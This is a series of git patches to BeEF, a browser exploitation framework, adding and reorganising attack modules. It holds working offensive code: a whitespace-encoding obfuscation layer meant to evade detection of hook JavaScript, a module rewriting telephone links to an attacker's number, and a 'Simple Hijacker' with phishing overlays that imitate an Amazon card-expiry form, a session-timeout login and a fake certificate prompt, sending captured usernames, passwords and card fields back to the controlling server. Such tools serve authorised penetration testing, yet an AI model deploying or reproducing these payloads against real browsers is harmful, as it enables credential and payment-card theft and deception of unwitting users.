From 57f68725bcbe339bc40ef0d68a7810a9c96c95e1 Mon Sep 17 00:00:00 2001 From: bcoles Date: Sat, 25 Aug 2012 18:54:15 +0930 Subject: [PATCH 1/8] Moved lcamtuf download module to social engineering category --- .../lcamtuf_download/command.js | 7 +++---- .../lcamtuf_download/config.yaml | 2 +- .../lcamtuf_download/module.rb | 3 +-- 3 files changed, 5 insertions(+), 7 deletions(-) rename modules/{browser => social_engineering}/lcamtuf_download/command.js (89%) rename modules/{browser => social_engineering}/lcamtuf_download/config.yaml (96%) rename modules/{browser => social_engineering}/lcamtuf_download/module.rb (97%) diff --git a/modules/browser/lcamtuf_download/command.js b/modules/social_engineering/lcamtuf_download/command.js similarity index 89% rename from modules/browser/lcamtuf_download/command.js rename to modules/social_engineering/lcamtuf_download/command.js index a827c99fa..2982cd00b 100644 --- a/modules/browser/lcamtuf_download/command.js +++ b/modules/social_engineering/lcamtuf_download/command.js @@ -21,12 +21,11 @@ beef.execute(function() { function doit() { - if (navigator.userAgent.indexOf('MSIE') == -1){ + if (!beef.browser.isIE()) { w = window.open('data:text/html,', 'foo'); - setTimeout(donext, 4500); - } + } function donext() { window.open(maliciousurl, 'foo'); @@ -34,5 +33,5 @@ beef.execute(function() { once = true; } doit(); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "Command executed"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed"); }); diff --git a/modules/browser/lcamtuf_download/config.yaml b/modules/social_engineering/lcamtuf_download/config.yaml similarity index 96% rename from modules/browser/lcamtuf_download/config.yaml rename to modules/social_engineering/lcamtuf_download/config.yaml index 0671d8844..329af0cbc 100644 --- a/modules/browser/lcamtuf_download/config.yaml +++ b/modules/social_engineering/lcamtuf_download/config.yaml @@ -17,7 +17,7 @@ beef: module: lcamtuf_download: enable: true - category: "Browser" + category: "Social Engineering" name: "Lcamtuf Download" description: "This module will attempt to execute a lcamtuf download. The file will be served with an alternative Content-Disposition: attachment header. For more information please refer to http://lcamtuf.blogspot.co.uk/2012/05/yes-you-can-have-fun-with-downloads.html ." authors: ["Bart Leppens"] diff --git a/modules/browser/lcamtuf_download/module.rb b/modules/social_engineering/lcamtuf_download/module.rb similarity index 97% rename from modules/browser/lcamtuf_download/module.rb rename to modules/social_engineering/lcamtuf_download/module.rb index 1d2b707dd..7d163b78c 100644 --- a/modules/browser/lcamtuf_download/module.rb +++ b/modules/social_engineering/lcamtuf_download/module.rb @@ -18,7 +18,6 @@ class Lcamtuf_download < BeEF::Core::Command # set and return all options for this module def self.options - return [{ 'name' => 'real_file_uri', 'description' => 'The web accessible URI for the real file.', @@ -33,7 +32,7 @@ class Lcamtuf_download < BeEF::Core::Command 'value' => '', 'width' => '300px' }, - { 'name' => 'do_once', 'type' => 'combobox', 'ui_label' => 'Once', 'store_type' => 'arraystore', + { 'name' => 'do_once', 'type' => 'combobox', 'ui_label' => 'Run Once', 'store_type' => 'arraystore', 'store_fields' => ['do_once'], 'store_data' => [['false'],['true']], 'valueField' => 'do_once', 'displayField' => 'do_once', 'mode' => 'local', 'value' => 'false', 'autoWidth' => true }] From 788cef08d3f18ab2bd2946219027e2a0f0cd57cc Mon Sep 17 00:00:00 2001 From: Jean-Louis Huynen Date: Wed, 29 Aug 2012 13:54:26 +0200 Subject: [PATCH 2/8] add whitespace obfuscation technique - should work in theory - but does not in practice --- extensions/evasion/obfuscation/whitespace.rb | 84 ++++++++++++++++++++ 1 file changed, 84 insertions(+) create mode 100644 extensions/evasion/obfuscation/whitespace.rb diff --git a/extensions/evasion/obfuscation/whitespace.rb b/extensions/evasion/obfuscation/whitespace.rb new file mode 100644 index 000000000..5f640651c --- /dev/null +++ b/extensions/evasion/obfuscation/whitespace.rb @@ -0,0 +1,84 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +module BeEF + module Extension + module Evasion + class Whitespace + include Singleton + + def need_bootstrap + false + end + + def execute(input, config) + print_debug input.length + encoded = encode(input) + var_name = BeEF::Extension::Evasion::Helper::random_string(3) + + config = BeEF::Core::Configuration.instance + hook = config.get("beef.http.hook_file") + host = config.get("beef.http.host") + port = config.get("beef.http.port") + decode_function = +" +//Dirty IE6 whitespace bug hack +#{var_name} = function (){ + jQuery.get(\'http://#{host}:#{port}#{hook}\', function callback(data) { + var output = ''; + var str = '//E'+'OH'; + var chunks = data.split(str); + for (var i = 0; i < chunks.length; i++) + { + if(chunks[i].substring(0,4) == '----') + { + input = chunks[i].split('\\n'); + input = input[0].substring(5); + for(y = 0; y < input.length/8; y++) + { + v = 0; + for(x = 0; x < 8; x++) + { + if(input.charCodeAt(x+(y*8)) > 9) + { + v++; + } + if(x != 7) + { + v = v << 1; + } + } + output += String.fromCharCode(v); + } + } + }alert(output.length);[].constructor.constructor(output)(); + }, 'text'); +} +#{var_name}();//EOH-----" + + input = "#{decode_function}#{encoded}" + print_debug "[OBFUSCATION - WHITESPACE] Javascript has been Whitespace Encoded" + input + end + + def encode(input) + output = input.unpack('B*') + output = output.to_s.gsub(/[\["01\]]/, '[' => '', '"' => '', ']' => '', '0' => "\t", '1' => ' ') + output + end + end + end + end +end From e86712413ca64d0c9f0a646ad1481320680153b9 Mon Sep 17 00:00:00 2001 From: Jean-Louis Huynen Date: Wed, 29 Aug 2012 18:22:22 +0200 Subject: [PATCH 3/8] modified whitespace evasion technique to keep it simple - modified beefjs (just one line, i don't had much time to investigate my change but it seems to work better with it than without it :) --- core/main/handlers/modules/beefjs.rb | 3 +- extensions/evasion/config.yaml | 5 +- extensions/evasion/extension.rb | 1 + extensions/evasion/obfuscation/whitespace.rb | 76 ++++++++------------ 4 files changed, 35 insertions(+), 50 deletions(-) diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb index 8e30ae735..38e48f05c 100644 --- a/core/main/handlers/modules/beefjs.rb +++ b/core/main/handlers/modules/beefjs.rb @@ -104,8 +104,7 @@ module BeEF if config.get("beef.extension.evasion.enable") evasion = BeEF::Extension::Evasion::Evasion.instance - @hook = evasion.add_bootstrapper + evasion.obfuscate(@hook) - @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate) + @hook + @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook) else @final_hook = ext_js_to_not_obfuscate + @hook end diff --git a/extensions/evasion/config.yaml b/extensions/evasion/config.yaml index 712989a31..7d9db7f91 100644 --- a/extensions/evasion/config.yaml +++ b/extensions/evasion/config.yaml @@ -16,7 +16,7 @@ beef: extension: evasion: - enable: true + enable: true name: 'Evasion' authors: ["antisnatchor"] exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"] @@ -26,4 +26,5 @@ beef: beef: "beef" Beef: "Beef" evercookie: "evercookie" - chain: ["scramble", "minify"] + #chain: ["scramble", "minify"] + chain: ["minify", "base64", "whitespace"] diff --git a/extensions/evasion/extension.rb b/extensions/evasion/extension.rb index ce1fc360e..e7e5c25d5 100644 --- a/extensions/evasion/extension.rb +++ b/extensions/evasion/extension.rb @@ -30,3 +30,4 @@ require 'extensions/evasion/helper' require 'extensions/evasion/obfuscation/scramble' require 'extensions/evasion/obfuscation/minify' require 'extensions/evasion/obfuscation/base_64' +require 'extensions/evasion/obfuscation/whitespace' diff --git a/extensions/evasion/obfuscation/whitespace.rb b/extensions/evasion/obfuscation/whitespace.rb index 5f640651c..8c20217f4 100644 --- a/extensions/evasion/obfuscation/whitespace.rb +++ b/extensions/evasion/obfuscation/whitespace.rb @@ -20,56 +20,40 @@ module BeEF include Singleton def need_bootstrap - false + true + end + + def get_bootstrap + # the decode function is in plain text - called IE-spacer - because trolling is always a good idea + decode_function = +"//Dirty IE6 whitespace bug hack +function IE_spacer(css_space) { + var spacer = ''; + for(y = 0; y < css_space.length/8; y++) + { + v = 0; + for(x = 0; x < 8; x++) + { + if(css_space.charCodeAt(x+(y*8)) > 9) + { + v++; + } + if(x != 7) + { + v = v << 1; + } + } + spacer += String.fromCharCode(v); + }return spacer; +}" end def execute(input, config) - print_debug input.length + size = input.length encoded = encode(input) - var_name = BeEF::Extension::Evasion::Helper::random_string(3) - - config = BeEF::Core::Configuration.instance - hook = config.get("beef.http.hook_file") - host = config.get("beef.http.host") - port = config.get("beef.http.port") - decode_function = -" -//Dirty IE6 whitespace bug hack -#{var_name} = function (){ - jQuery.get(\'http://#{host}:#{port}#{hook}\', function callback(data) { - var output = ''; - var str = '//E'+'OH'; - var chunks = data.split(str); - for (var i = 0; i < chunks.length; i++) - { - if(chunks[i].substring(0,4) == '----') - { - input = chunks[i].split('\\n'); - input = input[0].substring(5); - for(y = 0; y < input.length/8; y++) - { - v = 0; - for(x = 0; x < 8; x++) - { - if(input.charCodeAt(x+(y*8)) > 9) - { - v++; - } - if(x != 7) - { - v = v << 1; - } - } - output += String.fromCharCode(v); - } - } - }alert(output.length);[].constructor.constructor(output)(); - }, 'text'); -} -#{var_name}();//EOH-----" - - input = "#{decode_function}#{encoded}" - print_debug "[OBFUSCATION - WHITESPACE] Javascript has been Whitespace Encoded" + var_name = BeEF::Extension::Evasion::Helper::random_string(3) + input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(IE_spacer(#{var_name}))();" + print_debug "[OBFUSCATION - WHITESPACE] #{size}byte of Javascript code has been Whitespaced" input end From ab588c0f6816e87f03ee79c5f33cd108b41691be Mon Sep 17 00:00:00 2001 From: bcoles Date: Sun, 2 Sep 2012 16:58:43 +0930 Subject: [PATCH 4/8] Add link_rewrite_tel module Fixes issue #721 --- core/main/client/dom.js | 25 +++++++++++++++++ .../hooked_domain/link_rewrite_tel/command.js | 24 ++++++++++++++++ .../link_rewrite_tel/config.yaml | 25 +++++++++++++++++ .../hooked_domain/link_rewrite_tel/module.rb | 28 +++++++++++++++++++ 4 files changed, 102 insertions(+) create mode 100644 modules/browser/hooked_domain/link_rewrite_tel/command.js create mode 100644 modules/browser/hooked_domain/link_rewrite_tel/config.yaml create mode 100644 modules/browser/hooked_domain/link_rewrite_tel/module.rb diff --git a/core/main/client/dom.js b/core/main/client/dom.js index 387b514bf..4cb0c2cba 100644 --- a/core/main/client/dom.js +++ b/core/main/client/dom.js @@ -194,6 +194,31 @@ beef.dom = { return count; }, + /** + * Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number + * @param: {String} new_number: the new link telephone number to be written + * @param: {String} selector: the jquery selector statement to use, defaults to all a tags. + * @return: {Number} the amount of links found in the DOM and rewritten. + */ + rewriteTelLinks: function(new_number, selector) { + + var count = 0; + var re = new RegExp("tel:/?/?.*", "gi"); + var sel = (selector == null) ? 'a' : selector; + + $j(sel).each(function() { + if ($j(this).attr('href') != null) { + var url = $j(this).attr('href'); + if (url.match(re)) { + $j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; }); + count++; + } + } + }); + + return count; + }, + /** * Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed * @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}] diff --git a/modules/browser/hooked_domain/link_rewrite_tel/command.js b/modules/browser/hooked_domain/link_rewrite_tel/command.js new file mode 100644 index 000000000..d51007a95 --- /dev/null +++ b/modules/browser/hooked_domain/link_rewrite_tel/command.js @@ -0,0 +1,24 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + var tel_number = "<%= @tel_number %>"; + var selector = "a"; + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteTelLinks(tel_number, selector)+' telephone (tel) links rewritten to '+tel_number); + +}); + diff --git a/modules/browser/hooked_domain/link_rewrite_tel/config.yaml b/modules/browser/hooked_domain/link_rewrite_tel/config.yaml new file mode 100644 index 000000000..68618861e --- /dev/null +++ b/modules/browser/hooked_domain/link_rewrite_tel/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + link_rewrite_tel: + enable: true + category: ["Browser", "Hooked Domain"] + name: "Replace HREFs (TEL)" + description: "This module will rewrite all the href attributes of telephone links (ie, tel:5558585) to call a number of your choice." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/browser/hooked_domain/link_rewrite_tel/module.rb b/modules/browser/hooked_domain/link_rewrite_tel/module.rb new file mode 100644 index 000000000..929c62356 --- /dev/null +++ b/modules/browser/hooked_domain/link_rewrite_tel/module.rb @@ -0,0 +1,28 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Link_rewrite_tel < BeEF::Core::Command + + def self.options + return [ + { 'ui_label'=>'Number', 'name'=>'tel_number', 'description' => 'New telephone number', 'value'=>'5558585', 'width'=>'200px' } + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end From 931aeb6ee591c94adf9232900a78a6260b39f32b Mon Sep 17 00:00:00 2001 From: qswain2 Date: Mon, 3 Sep 2012 09:46:03 -0400 Subject: [PATCH 5/8] Fixed the module count in the ui to include sub modules (issue 708) --- extensions/admin_ui/controllers/modules/modules.rb | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb index a3d0c087c..b10ccc4bf 100644 --- a/extensions/admin_ui/controllers/modules/modules.rb +++ b/extensions/admin_ui/controllers/modules/modules.rb @@ -591,12 +591,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController # append the number of command modules so the branch name results in: " (num)" parent.each {|command_module_branch| if command_module_branch.is_a?(Hash) and command_module_branch.has_key?('children') - num_of_command_modules = command_module_branch['children'].length - command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")" - + num_of_subs = 0 command_module_branch['children'].each {|c| + #add in the submodules and subtract 1 for the folder node + num_of_subs+=c['children'].length-1 if c.has_key?('children') retitle_recursive_tree([c]) if c.has_key?('cls') and c['cls'] == 'folder' } + num_of_command_modules = command_module_branch['children'].length + num_of_subs + command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")" + end } end From 05d7fe3adf0a48d879894c2affaa53418e49a306 Mon Sep 17 00:00:00 2001 From: Jean-Louis Huynen Date: Tue, 4 Sep 2012 17:47:59 +0200 Subject: [PATCH 6/8] Adding the Simple Hijacker module in social engineering (route clicks on some links to javascript code) --- .../simple_hijacker/command.js | 37 ++++++ .../simple_hijacker/config.yaml | 26 +++++ .../simple_hijacker/module.rb | 50 +++++++++ .../simple_hijacker/templates/amazon.js | 28 +++++ .../templates/chromecertbeggar.js | 50 +++++++++ .../simple_hijacker/templates/confirmbox.js | 10 ++ .../simple_hijacker/templates/credential.js | 105 ++++++++++++++++++ 7 files changed, 306 insertions(+) create mode 100644 modules/social_engineering/simple_hijacker/command.js create mode 100644 modules/social_engineering/simple_hijacker/config.yaml create mode 100644 modules/social_engineering/simple_hijacker/module.rb create mode 100644 modules/social_engineering/simple_hijacker/templates/amazon.js create mode 100644 modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js create mode 100644 modules/social_engineering/simple_hijacker/templates/confirmbox.js create mode 100644 modules/social_engineering/simple_hijacker/templates/credential.js diff --git a/modules/social_engineering/simple_hijacker/command.js b/modules/social_engineering/simple_hijacker/command.js new file mode 100644 index 000000000..adcc3e4b2 --- /dev/null +++ b/modules/social_engineering/simple_hijacker/command.js @@ -0,0 +1,37 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +hijack = function(){ + function send(answer){ + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer); + } + <% target = @targets.split(',') %> + $j('a').click(function(e) { + e.preventDefault(); + if ($j(this).attr('href') != '') + { + if( <% target.each{ |href| %> $j(this).attr('href').indexOf("<%=href%>") != -1 <% if href != target.last %> || <% else %> ) <% end %><% } %>{ + <%= instance_variable_get("@#{@choosetmpl}") %> + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Template "<%= @choosetmpl %>" applied to '+$j(this).attr('href')); + } + } + }); +} + +beef.execute(function() { + hijack(); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Hijacker ready, now waits for user action'); +}); diff --git a/modules/social_engineering/simple_hijacker/config.yaml b/modules/social_engineering/simple_hijacker/config.yaml new file mode 100644 index 000000000..8fbb9209d --- /dev/null +++ b/modules/social_engineering/simple_hijacker/config.yaml @@ -0,0 +1,26 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + simple_hijacker: + enable: true + category: "Social Engineering" + name: "Simple Hijacker" + description: "Hijack clicks on links to display what you want." + templates: ["credential", "confirmbox", "amazon", "chromecertbeggar"] + authors: ["gallypette"] + target: + user_notify: ['ALL'] diff --git a/modules/social_engineering/simple_hijacker/module.rb b/modules/social_engineering/simple_hijacker/module.rb new file mode 100644 index 000000000..d9a66c1dd --- /dev/null +++ b/modules/social_engineering/simple_hijacker/module.rb @@ -0,0 +1,50 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Simple_hijacker < BeEF::Core::Command + + def self.options + + config = BeEF::Core::Configuration.instance + @templates = config.get('beef.module.simple_hijacker.templates') + + # Defines which domains to target + data = [] + data.push({'name' =>'targets', 'description' =>'list domains you want to hijack - separed by ,', 'ui_label'=>'Targetted domains', 'value' => 'beef'}) + + # We'll then list all templates available + tmptpl = [] + @templates.each{ |template| + tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{template}.js" + raise "Invalid template path for command template #{template}" if not File.exists?(tplpath) + file = File.open(tplpath, "r") + data.push({'name' => template, 'type' => 'hidden', 'value' => file.read}) + tmptpl<<[ template] + } + + data.push({'name' => 'choosetmpl', 'type' => 'combobox', 'ui_label' => 'Template to use', 'store_type' => 'arraystore', 'store_fields' => ['tmpl'], 'store_data' => tmptpl, 'valueField' => 'tmpl', 'displayField' => 'tmpl' , 'mode' => 'local', 'emptyText' => "Choose a template"}) + + return data + end + + # + # This method is being called when a zombie sends some + # data back to the framework. + # + def post_execute + save({'answer' => @datastore['answer']}) + end + +end diff --git a/modules/social_engineering/simple_hijacker/templates/amazon.js b/modules/social_engineering/simple_hijacker/templates/amazon.js new file mode 100644 index 000000000..0c58ba121 --- /dev/null +++ b/modules/social_engineering/simple_hijacker/templates/amazon.js @@ -0,0 +1,28 @@ + beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null); + $j(document).attr('title', $j(this).html()); + document.body.scroll = 'no'; + document.documentElement.style.overflow = 'hidden'; + + collect = function(){ + answer = ""; + $j(":input").each(function() { + answer += " "+$j(this).attr("name")+":"+$j(this).val(); + }); + send(answer); + } + + // floating div + function writediv() { + sneakydiv = document.createElement('div'); + sneakydiv.setAttribute('id', 'hax'); + sneakydiv.setAttribute('display', 'block'); + sneakydiv.setAttribute('style', 'width:60%;position:fixed; top:200px; left:220px; z-index:51;background-color:#FFFFFF;opacity:1;font-family: verdana,arial,helvetica,sans-serif;font-size: small;'); + document.body.appendChild(sneakydiv); + sneakydiv.innerHTML= '
Your credit card details expired, please enter your new credit card credential to continue shopping-
Changes made to your payment methods will not affect orders you have already placed.
Your Account>

Add a Credit or Debit Card

  Edit your payment method:
Cardholder Name:
Exp. Date: 
Number:
Confirm
'; + } + + writediv(); + + $j("#confirm").click(function () { + $j('#hax').remove(); + }); diff --git a/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js new file mode 100644 index 000000000..d1adce6d5 --- /dev/null +++ b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js @@ -0,0 +1,50 @@ + // floating div + function writediv() { + sneakydiv = document.createElement('div'); + sneakydiv.setAttribute('id', 'background'); + sneakydiv.setAttribute('oncontextmenu','return false;'); + sneakydiv.setAttribute('style', 'overflow:hidden;position:absolute;width:100%;height:100%;top:0px;left:0px;z-index:51;opacity:1;background-color:#500; font-family:Helvetica,Arial,sans-serif; margin:0px;'); + document.body.appendChild(sneakydiv); + sneakydiv.innerHTML= '
background
SSL Error Icon
Please accept our new SELF®-Signed Certificate to ensure maximum security protection.
'+domain+' chose SELF® to protect your security. If your browser raise any warning after this one it means that it\'s not up-to-date. Accept this certificate then please consider updating your browser as soon as possible.

SELF® - to make the Internet a safer place.
read more about the SELF® certification authority

Security Enhanced Layer Factory®: because nobody of us cannot realize the full potential of the Internet, unless it is a reliable place to interact and to deal. Our dependence on computers and the Internet increases every day, like our vulnerability. Daily news reports confirm a clear and present danger to all the Internet users (worms, viruses, trojans, malware, cybercrime, cyber-terrorism and related threats). These threats, mainly the very sophisticated group work of organized crime, directly harm millions of Internet users have real confidence in the Internet. Every individual or the company using the Internet has a role in the restoring of trust. SELF® help people as customer or seller to feel safe by issuing SELF®-signed certificate that are build to last. With SELF® you will never be harmed again - Trust is our workship.

Security Enhanced Layer Factory®, SELF® and SELF® logo are registered trademarks.

'; + toggleMoreInfo(true); + setDirectionSensitiveImages(); + } + + forward = function(){ + send("User continuing to "+target); + timer=setInterval(function(){window.location = target;},500); + } + + getDomain = function(url){ + return url.match(/:\/\/(www\.)?(.[^/:]+)/)[2]; + } + + function $(o) {return document.getElementById(o);} + + sendCommand = function(cmd) { + window.domAutomationController.setAutomationId(1); + window.domAutomationController.send(cmd); + } + + toggleMoreInfo = function(collapse) { + if (collapse) { + $("more_info_long").style.display = "none"; + $("more_info_short").style.display = "block"; + } else { + $("more_info_long").style.display = "block"; + $("more_info_short").style.display = "none"; + } + } + setDirectionSensitiveImages = function () { + if (document.documentElement.dir == 'rtl') { + $("twisty_closed_rtl").style.display = "inline"; + } else { + $("twisty_closed").style.display = "inline"; + } + } + + target = $j(this).attr('href'); + domain = getDomain(target); + $j(document).attr('title', domain+" Security Enhanced Layer Factory® certificate acceptance"); + writediv(); + diff --git a/modules/social_engineering/simple_hijacker/templates/confirmbox.js b/modules/social_engineering/simple_hijacker/templates/confirmbox.js new file mode 100644 index 000000000..d8c79bc7b --- /dev/null +++ b/modules/social_engineering/simple_hijacker/templates/confirmbox.js @@ -0,0 +1,10 @@ +var answer = confirm("Do you really want to leave us ??") +if (answer){ + alert("Okay :(") + send("User chose to leave."); + window.location = $j(this).attr('href'); +} +else{ + alert("Okay enjoy ") + send("User chose to stay."); +} diff --git a/modules/social_engineering/simple_hijacker/templates/credential.js b/modules/social_engineering/simple_hijacker/templates/credential.js new file mode 100644 index 000000000..d0b1eacb0 --- /dev/null +++ b/modules/social_engineering/simple_hijacker/templates/credential.js @@ -0,0 +1,105 @@ + imgr = "http://0.0.0.0:3000/ui/media/images/beef.png"; + var answer= ''; + + beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null); + $j(document).attr('title', $j(this).html()); + document.body.scroll = 'no'; + document.documentElement.style.overflow = 'hidden'; + + // set up darkening + function grayOut(vis, options) { + // Pass true to gray out screen, false to ungray + // options are optional. This is a JSON object with the following (optional) properties + // opacity:0-100 // Lower number = less grayout higher = more of a blackout + // zindex: # // HTML elements with a higher zindex appear on top of the gray out + // bgcolor: (#xxxxxx) // Standard RGB Hex color code + // grayOut(true, {'zindex':'50', 'bgcolor':'#0000FF', 'opacity':'70'}); + // Because options is JSON opacity/zindex/bgcolor are all optional and can appear + // in any order. Pass only the properties you need to set. + var options = options || {}; + var zindex = options.zindex || 50; + var opacity = options.opacity || 70; + var opaque = (opacity / 100); + var bgcolor = options.bgcolor || '#000000'; + var dark=document.getElementById('darkenScreenObject'); + if (!dark) { + // The dark layer doesn't exist, it's never been created. So we'll + // create it here and apply some basic styles. + // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917 + var tbody = document.getElementsByTagName("body")[0]; + var tnode = document.createElement('div'); // Create the layer. + tnode.style.position='absolute'; // Position absolutely + tnode.style.top='0px'; // In the top + tnode.style.left='0px'; // Left corner of the page + tnode.style.overflow='hidden'; // Try to avoid making scroll bars + tnode.style.display='none'; // Start out Hidden + tnode.id='darkenScreenObject'; // Name it so we can find it later + tbody.appendChild(tnode); // Add it to the web page + dark=document.getElementById('darkenScreenObject'); // Get the object. + } + if (vis) { + // Calculate the page width and height + if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) { + var pageWidth = document.body.scrollWidth+'px'; + var pageHeight = document.body.scrollHeight+'px'; + } else if( document.body.offsetWidth ) { + var pageWidth = document.body.offsetWidth+'px'; + var pageHeight = document.body.offsetHeight+'px'; + } else { + var pageWidth='100%'; + var pageHeight='100%'; + } + //set the shader to cover the entire page and make it visible. + dark.style.opacity=opaque; + dark.style.MozOpacity=opaque; + dark.style.filter='alpha(opacity='+opacity+')'; + dark.style.zIndex=zindex; + dark.style.backgroundColor=bgcolor; + dark.style.width= pageWidth; + dark.style.height= pageHeight; + dark.style.display='block'; + } else { + dark.style.display='none'; + } + } + + // function to send response + function win(){ + document.getElementById('hax').innerHtml='

Thank you for re-authenticating, you will now be returned to the application

'; + answer = document.getElementById('uname').value+':'+document.getElementById('pass').value; + } + + // perform darkening + grayOut(true); + + function checker(){ + processval = document.body.lastChild.getElementsByTagName("input")[2].value; + if (processval == "Processing..") { + uname = document.body.lastChild.getElementsByTagName("input")[0].value; + pass = document.body.lastChild.getElementsByTagName("input")[1].value; + answer = uname+":"+pass + send(answer); + // set lastchild invisible + document.body.lastChild.setAttribute('style','display:none'); + // lighten screen + grayOut(false); + clearInterval(credgrabber); + $j('#hax').remove(); + $j('#darkenScreenObject').remove(); + } + } + + + // floating div + function writeit() { + sneakydiv = document.createElement('div'); + sneakydiv.setAttribute('id', 'hax'); + sneakydiv.setAttribute('style', 'width:400px;height:320px;position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000'); + sneakydiv.setAttribute('align', 'center'); + document.body.appendChild(sneakydiv); + sneakydiv.innerHTML= '

Your session has timed out!

For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.

Username:
Password:

